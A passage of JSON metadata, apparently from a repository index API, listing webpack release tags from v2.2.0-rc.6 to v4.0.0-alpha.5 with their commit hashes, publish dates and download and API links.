ha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.